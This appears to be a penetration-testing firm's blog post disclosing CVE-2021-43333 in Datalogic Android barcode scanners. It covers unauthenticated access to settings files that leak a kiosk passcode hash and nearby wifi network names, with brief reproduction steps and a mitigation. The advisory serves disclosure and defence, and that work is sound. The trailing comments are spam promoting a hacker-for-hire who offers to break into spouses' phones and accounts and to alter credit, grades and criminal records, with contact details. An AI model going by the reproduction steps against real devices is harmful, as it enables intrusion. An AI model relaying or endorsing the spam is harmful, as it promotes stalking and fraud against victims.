During a recent pentest for a client we discovered a number of devices on their network that looked interesting, after 25 years of performing pentests you start to get a gut feeling about these things.
As with every pentest we have to ensure that all standard testing is performed before we start to look into the more interesting things we might want to look at. Thankfully our client provided us the extra time to do so, and my gut feelings were correct. The security issues we found were assigned CVE-2021-43333.
The devices question were handheld Android-based barcode scanners used for inventory purposes across a number of geo-locations. Built by a company called DataLogic, these devices are invaluable to organisations that require fast, reliable and cost effective inventory checkin/checkout systems.
After identifying the issues, we have spent the last few months working hard with Datalogic, who have been a stellar example of how to respond, communicate and remediate issues brought to them by a security company. We are pleased to announce that Datalogic have not only fixed the issues in their current lineup but have also published remediation steps for those with older and even end-of-life products. That Datalogic are willing to support EOL devices to prevent security issues shows a commitment to their clients that other companies could learn a lot from.
At our request, Mitre assigned the two issues a single CVE in early November 2021 and now that Datalogic have released their fixes we are delighted to share the details with you.
Please see the security advisory from Datalogic here.
Please find the CVE details here (this will update when Mitre release to the public)
And for those of you who don't want to click links, please continue to read below.
Details
The Datalogi DL Axist handheld scanner is a full touch PDA with barcode scanner, used in the field for asset management etc. The device runs on Android 4.4.4 and runs several services. One of these is a web server; within the web server it is possible to request unauthenticated settings files for the device. The device uses software provided by Gear42 for locking the device; the passwords for this lock code are stored within the settings files as a SHA512 hash. Another issue is that the device settings also store the current available wifi access points near to the device.
The SHA512 code in a default installation is set to
"c6001d5b2ac3df314204a8f9d7a00e1503c9aba0fd4538645de4bf4cc7e2555cfe9ff9d0236bf327ed3e907849a98df4d330c4bea551017d465b4c1d9b80bcb0"
This is the default passcode of '0000'
Obviously the default passcode can be changed, but as this code is often a small PIN, it would be trivial to identify using online decoders. It should be noted that this unlock code is not one for the device as we first suspected but the passcode for the SureLogic launcher (a KIOSK solution for Android).
The second file that is of interest is the getSettings.xml which leaks a list of configured
wifi access points. Whilst this does not show the configured wifi passwords, this list of wifi access points can obviously be correlated with sites such as wigle.net and
the location of the device narrowed down if unknown. In the case of our client, we were able to pinpoint multiple secure locations that contain highly valuable assets.
Proof of concept/Steps to replicate
Browse to either a non-existent location on the web server and the 404 page will direct you to the settings files, alternatively you can browse directly to /getSettings.xml or /getInfo.xml to obtain the data.
Mitigation and Fixes
To avoid this security vulnerability, the DXU service must be disabled. This can be done on your device by performing the following steps:
Open DXU Agent.
Tap on the more icon in the lower right corner. This will cause a black bar pop-up.
Tap "Settings" on the black bar. This will bring up the settings menu.
Tap "Settings" in the menu. This will bring up general DXU agent settings.
Uncheck the "Enable service" checkbox.
On newer devices, such as the Skorpio X5, the service is off by default. On older devices, such as the DL-Axist, the service is on by default.
Thanks
Cygenta would like to thank the staff at Datalogic for their professionalism, dedication to their clients and speed in mobilising their internal teams to remediate the security issues. In particular I would like to recognise Don and Simone for being key players in handling this issue.
To book your next pentest with us please feel free to get in touch with us to discuss how we can help you achieve your goals.
I appreciate Henry for making me realise the truth to a certified hacker who knows a lot about what he is doing. I strongly recommend you hire him because he’s the best out there and always delivers. I have referred over 10 people to him and all had positive results. He can help you hack into any devices, social networks including – Facebook, Hangout, iMessages, Twitter accounts, Snap chat , Instagram, Whatsapp, wechat, text messages ,smartphone cloning,tracking emails and also any other social media messenger or sites. It’s advisable to hire a professional hacker.Thank me later. Contact him here., Henryclarkethicalhacker@gmail.com and you can text, call and Whatsapp him on +1(201)4305865, or +1(219)7960574.....
Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on,…
I’m excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse’s phone without a physical installation app. And I was able to access my spouse’s phone, SMS, Whatsapp, Instagram, Facebook, Wechat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone.I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact:, Henryclarkethicalhacker@gmail.com and you can text, call him on whatsapp…